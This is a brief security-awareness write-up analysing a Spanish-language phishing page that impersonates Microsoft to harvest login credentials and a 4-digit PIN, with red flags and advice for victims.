This screenshot shows a Spanish‑language phishing page impersonating Microsoft, asking for an unusual combination of credentials: email/phone/Skype, password, and a 4‑digit PIN.
Threat Analysis: Microsoft Phishing – Credential & PIN Harvesting
The page mimics Microsoft’s login interface but adds a 4‑digit PIN field, which is not part of a standard Microsoft login flow. This extra field may be intended to capture a SIM PIN, banking PIN, or a secondary security code that the victim uses elsewhere.
How it works:
The victim receives a phishing email or message claiming a security alert or account issue. The link leads to this page. After entering the email, password, and a 4‑digit PIN, the data is sent to the attacker.
The goal:
- Steal Microsoft account credentials (email and password) to access email and linked services
- Capture a 4‑digit PIN that the victim may reuse for banking, phone, or other sensitive accounts
Red flags:
- Suspicious URL: The page is hosted on a domain that is not
microsoft.comoroutlook.com. - Extra PIN field: A legitimate Microsoft login does not ask for a 4‑digit PIN at this stage.
- No security image or personalization: Real Microsoft login pages show security phrases or alternate verification methods.
- Unsolicited login request: Microsoft does not send links requiring users to log in to resolve issues.
What to do:
- Do not enter any credentials or PIN.
- If you have already submitted information, change your Microsoft password immediately and enable two‑factor authentication. If you used the same PIN elsewhere (e.g., bank card), contact the relevant institutions.
- Always access Microsoft services by typing
outlook.comormicrosoft.comdirectly.
Protective measures:
- Bookmark the official Microsoft login page and use it exclusively.
- Use a password manager – it will not autofill on fake domains.
- Never reuse PINs across different services.
- Enable two‑factor authentication on your Microsoft account.